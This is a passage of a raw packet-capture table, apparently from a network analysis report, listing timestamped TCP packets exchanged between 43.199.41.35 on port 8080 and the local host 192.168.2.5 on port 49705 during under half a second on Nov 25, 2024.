                                                                                                                                                        Nov 25, 2024 11:10:18.760602951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.760648966 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.761467934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.761535883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.761586905 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.762392998 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.762511969 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.762562037 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.763274908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.763367891 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.763413906 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.764079094 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.764178038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.764226913 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.764974117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.765125990 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.765177965 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.765815020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.807758093 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.870409012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.870434999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.870498896 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.870865107 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.871047020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.871098995 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.871716976 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.871854067 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.871906042 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.872628927 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.872734070 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.872786045 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.873501062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.873613119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.873661041 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.874385118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.874490023 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.874536037 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.875264883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.875350952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.875391006 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.899369001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.899485111 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.899543047 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.899732113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.899823904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.899864912 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.900588036 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.900741100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.900791883 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.901480913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.901638031 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.901679039 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.902371883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.902478933 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.902513981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.903300047 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.903664112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.903707981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.904139996 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.904252052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.904308081 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.904992104 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.905114889 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.905153036 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.905950069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.906074047 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.906121016 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.906819105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.906913042 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.906961918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.926532984 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.926734924 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.926796913 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.926868916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.927052021 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.927095890 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.927742958 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.927849054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.927933931 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.928654909 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.928853035 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.928900003 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.929521084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.929591894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.929641962 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.930469990 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.930582047 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.930624962 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.931277990 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.931417942 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.931462049 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.932167053 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.932406902 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.932496071 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.933068037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.933211088 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.933259964 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.933967113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.934094906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.934135914 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.934876919 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.934999943 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.935045004 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.935744047 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.935897112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.935944080 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.936695099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.936901093 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.936938047 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.937545061 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.937807083 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.937841892 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.938415051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.938555002 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.938585997 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.939369917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.939513922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.939553976 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.940215111 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.940305948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.940357924 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.941056967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.941165924 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.941210032 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.941932917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.942039967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.942081928 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.942840099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.943000078 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.943039894 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.943718910 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.943830013 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.943869114 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.944592953 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.944705963 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.944742918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.945533991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.945672989 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.945717096 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.946400881 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.946492910 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.946553946 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.947292089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.947324038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.947365046 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.948139906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.948252916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.948296070 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.949032068 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.949155092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.949198961 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.949951887 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.950223923 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.950267076 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.950828075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.951036930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.951075077 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.951670885 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.951795101 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.951833010 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.952570915 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.952687025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.952728033 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.953459978 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.953618050 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.953660965 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.954335928 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.954466105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.954509020 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.955250978 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.955358028 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.955404043 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.956103086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.956216097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.956259966 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.956984997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.957109928 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.957153082 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.957874060 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.010839939 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.062586069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.062658072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.062722921 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.063018084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.063144922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.063190937 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.063901901 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.064053059 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.064116955 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.064819098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.064968109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.065018892 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.065685034 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.065795898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.065843105 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.066611052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.066672087 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.066720009 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.067446947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.067512989 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.067569971 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.091432095 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.091586113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.091753006 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.091788054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.091897964 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.091957092 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.092721939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.092808008 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.092895031 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.093583107 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.093702078 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.093787909 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.094468117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.094594955 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.094675064 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.095346928 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.095453978 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.095504999 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.096223116 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.096339941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.096401930 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.097168922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.097820044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.097878933 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.098165035 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.098377943 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.098440886 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.099132061 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.099226952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.099271059 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.119038105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.119122028 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.119182110 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.119409084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.119606972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.119654894 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.120302916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.120397091 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.120452881 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.121189117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.121306896 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.121417046 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.122052908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.122180939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.122230053 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.122924089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.123038054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.123083115 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.123949051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.123996973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.124058962 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.124703884 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.124866962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.124917984 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.125588894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.125696898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.125754118 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.126487017 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.126614094 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.126696110 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.127384901 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.127515078 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.127583981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.128267050 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.128375053 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.128431082 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.129205942 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.129286051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.129373074 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.130091906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.130179882 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.130254030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.130934954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.131042004 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.131093979 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.131822109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.131906033 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.131999969 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.132697105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.132795095 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.132846117 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.133608103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.133750916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.133812904 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.134607077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.134727001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.134768963 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.135374069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.135504961 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.135581970 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.136229992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.136342049 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.136389971 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.137108088 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.137240887 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.137284040 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.138008118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.138120890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.138176918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.138916969 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.139024973 CET80804970543.199.41.35192.168.2.5
